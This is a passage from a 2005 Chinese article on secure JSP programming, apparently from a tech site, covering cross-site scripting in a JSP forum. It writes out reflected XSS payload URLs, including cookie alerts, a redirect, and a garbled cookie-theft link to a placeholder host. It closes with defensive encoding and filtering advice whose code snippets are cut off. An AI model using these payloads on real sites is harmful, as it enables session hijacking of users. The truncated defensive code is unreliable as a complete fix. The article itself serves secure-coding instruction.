|
三、长盛不衰的跨站脚本 跨站脚本(Cross Site Scripting)攻击是指在远程WEB页面的HTML代码中手插入恶意的JavaScript, VBScript, ActiveX, HTML, 或Flash等脚本,窃取浏览此页面的用户的隐私,改变用户的设置,破坏用户的数据。跨站脚本攻击在多数情况下不会对服务器和WEB程序的运行造成影响,但对客户端的安全构成严重的威胁。 以仿动网的阿菜论坛(beta-1)举个最简单的例子。当我们提交 http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<;script>alert(document.cookie)</script> 便能弹出包含自己cookie信息的对话框。而提交 http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<;script>document.location='http://www.163.com'</script> 就能重定向到网易。 由于在返回“name”变量的值给客户端时,脚本没有进行任何编码或过滤恶意代码,当用户访问嵌入恶意“name”变量数据链接时,会导致脚本代码在用户浏览器上执行,可能导致用户隐私泄露等后果。比如下面的链接: http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<;script>document.location=' xxx.xxx用于收集后边跟的参数,而这里参数指定的是document.cookie,也就是访问此链接的用户的cookie。在ASP世界中,很多人已经把偷cookie的技术练得炉火纯青了。在JSP里,读取cookie也不是难事。当然,跨站脚本从来就不会局限于偷cookie这一项功能,相信大家都有一定了解,这里就不展开了。 对所有动态页面的输入和输出都应进行编码,可以在很大程度上避免跨站脚本的攻击。遗憾的是,对所有不可信数据编码是资源密集型的工作,会对 Web 服务器产生性能方面的影响。常用的手段还是进行输入数据的过滤,比如下面的代码就把危险的字符进行替换: <% String message = request.getParameter("message"); 更积极的方式是利用正则表达式只允许输入指定的字符: public boolean isValidInput(String str)
|
正在阅读:JSP安全编程实例浅析JSP安全编程实例浅析
2005-01-19 10:37
出处:
责任编辑:xietaoming
键盘也能翻页,试试“← →”键
